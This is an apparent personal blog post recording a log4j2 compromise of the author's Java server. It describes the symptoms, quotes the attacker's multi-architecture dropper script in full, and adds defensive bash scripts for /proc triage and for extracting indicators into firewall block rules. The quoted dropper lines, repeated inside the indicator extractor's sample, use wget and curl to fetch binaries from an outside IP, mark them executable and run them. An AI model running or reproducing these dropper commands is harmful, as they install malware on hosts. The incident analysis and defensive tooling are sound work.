Little White Rabbit's Little Site

Since you have chosen the distant horizon, press on through wind and rain


Server Security: Recording a Virus Sample

At the end of 2021 the high-severity log4j2 vulnerability was disclosed, and as it happens my Java application got hit. I don't know by what means the attacker placed the script in my project's root directory and got it to execute; this post just records the server's symptoms at the time and the attack script.

Server symptoms:

  1. Looking at the process list, I found large numbers of ./Exploit; from the script below I learned that this was the virus itself
  2. Server CPU usage was high, and the hosting provider emailed me a warning
  3. I received a third-party complaint that my server was attacking their website; that email was forwarded to me by the hosting provider

Investigation process:

  1. Looked up the meaning of the word "exploit"; combined with a process list full of ./Exploit, my initial judgement was that this was a malicious process
  2. Where was ./Exploit? Unfortunately, as a Linux novice I couldn't find it, so I gave up, backed up my data and prepared to reinstall the system~
  3. In the end, after I copied the backup data to Windows, Defender's automatic scan found it, sitting in the root directory of the Java project
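Step 2 above, finding the file behind a running process, is where /proc helps: every live process exposes its executable and its working directory as symlinks under /proc/<pid>/, and the kernel keeps those links valid even if the attacker renames or deletes the file after starting it. The bash script below is an added example, not code from the original post. The ps output embedded in it is constructed to match the symptom described above (many ./Exploit processes under the Java application), and the process name Exploit and the column layout of `ps -eo pid,ppid,user,args` are its only assumptions.

```shell
#!/bin/bash
# Added example, not from the original post: locate the file behind a process
# seen in the process list (here "Exploit") without searching the whole disk.
# /proc/<pid>/exe and /proc/<pid>/cwd point straight at it.

# Constructed sample of `ps -eo pid,ppid,user,args` output, modelled on the
# symptom described in the post. Not real captured data.
SAMPLE_PS='  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  812     1 app      java -jar /opt/myapp/app.jar
 4013   812 app      ./Exploit log4j2
 4014   812 app      ./Exploit log4j2
 4015  4013 app      ./Exploit log4j2
 4100     1 app      /bin/bash'

# Print the PIDs whose command is ./<name> or <name>, one per line.
# Column 4 of the ps layout above is the first word of the command line.
pids_for_name() {
  local name="$1" input="$2"
  printf '%s\n' "$input" | awk -v n="$name" '
    NR > 1 && ($4 == ("./" n) || $4 == n) { print $1 }'
}

# For a live PID, report the executable path and working directory from /proc.
# readlink is used instead of `ls -l` so the output is script-friendly; a
# binary unlinked after launch still resolves, with " (deleted)" appended.
describe_pid() {
  local pid="$1"
  [ -d "/proc/$pid" ] || { echo "pid $pid: not running"; return 1; }
  printf 'pid %s: exe=%s cwd=%s\n' "$pid" \
    "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')" \
    "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
}

# Triage driver for a live host: find matching PIDs in the real process
# list, then resolve each one through /proc. Run as root to see every process.
triage() {
  local name="${1:-Exploit}"
  pids_for_name "$name" "$(ps -eo pid,ppid,user,args)" | while read -r pid; do
    describe_pid "$pid"
  done
}

# Demo on the constructed sample: prints 4013, 4014 and 4015.
pids_for_name Exploit "$SAMPLE_PS"
```

On the affected host, `triage Exploit` gives the directory each ./Exploit was started from (its cwd, which is where the dropper's `cd` chain landed) and the path of the binary itself. Because /proc/<pid>/exe can be read like a regular file, `cat /proc/<pid>/exe > sample.bin` recovers a copy of the malware for analysis before you kill the process, even if the original file has already been removed from disk.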

Below is the virus script that attacked my server. Just look at it; don't save it, let alone execute it, out of curiosity!

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > Exploit; chmod +x *; ./Exploit log4j2
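The script above is a generic multi-architecture downloader: every line is the same except for the payload suffix (x86, mips, mpsl, arm, arm5, arm6, arm7, ppc, m68k, spc, i686, sh4, arc). Each line changes into the first of /tmp, /var/run, /mnt, /root and / that it can enter, fetches the payload with wget and again with curl in case one tool is missing, copies it to a file named Exploit, marks everything in that directory executable with `chmod +x *`, and runs it with log4j2 as its only argument; whichever payload matches the host's CPU is the one that keeps running. For a responder the useful output is the list of indicators: the host it downloads from, the payload URLs, the directories it may have dropped into and the file name it writes. The bash script below is an added example, not part of the original post, that extracts those from the script text. The two embedded lines are the first two lines of the script above (the rest differ only in suffix), and the iptables rule syntax it prints is an assumption about the host's firewall.

```shell
#!/bin/bash
# Added example, not part of the original post: pull indicators of compromise
# out of a multi-arch downloader script so they can be blocked and hunted for.
# Every function takes the script text as its first argument.

# First two lines of the downloader quoted in the post; the remaining lines
# differ only in the payload suffix, so two are enough to exercise each extractor.
SAMPLE_SCRIPT='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > Exploit; chmod +x *; ./Exploit log4j2'

# Distinct URLs handed to wget/curl (each URL appears twice per line).
extract_urls() {
  printf '%s\n' "$1" | grep -oE "https?://[^ ;\"']+" | sort -u
}

# Distinct download hosts: scheme and path stripped from each URL.
extract_hosts() {
  extract_urls "$1" | sed -E 's#^https?://([^/]+).*#\1#' | sort -u
}

# CPU architectures the dropper tries, taken from the payload file suffix.
extract_archs() {
  extract_urls "$1" | sed -E 's#.*\.([A-Za-z0-9]+)$#\1#' | sort -u
}

# Directories the dropper tries to cd into, in the order it tries them
# (first line only; every line repeats the same chain).
extract_drop_dirs() {
  printf '%s\n' "$1" | head -n1 | grep -oE 'cd [^ ;|]+' | sed 's/^cd //' | awk '!seen[$0]++'
}

# Name the payload is written to (the target of "cat ... > NAME").
extract_dropped_name() {
  printf '%s\n' "$1" | grep -oE '> *[A-Za-z0-9_.-]+' | sed -E 's/^> *//' | sort -u
}

# Egress firewall rules for the download hosts. iptables syntax is assumed;
# the rules are printed, not applied, so they can be reviewed first.
block_rules() {
  extract_hosts "$1" | sed 's/^/iptables -A OUTPUT -d /; s/$/ -j DROP/'
}

# Look for the dropped binary in every directory the script could have used,
# plus any extra directories passed after the script (e.g. the application root).
hunt_dropped_files() {
  local script="$1"; shift
  local name; name=$(extract_dropped_name "$script")
  { extract_drop_dirs "$script"; printf '%s\n' "$@"; } | while read -r dir; do
    [ -n "$dir" ] && { find "$dir" -maxdepth 1 -name "$name" 2>/dev/null || true; }
  done
}

# Human-readable summary of everything above.
ioc_report() {
  echo "hosts:";        extract_hosts "$1" | sed 's/^/  /'
  echo "urls:";         extract_urls "$1" | sed 's/^/  /'
  echo "archs:";        extract_archs "$1" | xargs | sed 's/^/  /'
  echo "drop dirs:";    extract_drop_dirs "$1" | xargs | sed 's/^/  /'
  echo "dropped name:"; extract_dropped_name "$1" | sed 's/^/  /'
}

ioc_report "$SAMPLE_SCRIPT"
```

Feed the full script in (`ioc_report "$(cat dropper.sh)"`) and the archs list grows to all thirteen suffixes while hosts, drop dirs and dropped name stay the same, which is the point: one host and one file name are enough to block the download and to run `hunt_dropped_files "$(cat dropper.sh)" /path/to/java/project` across every location the dropper could have written to. Keep the /proc-based check of running processes alongside this, since a binary that was unlinked after launch will not show up in a filesystem hunt.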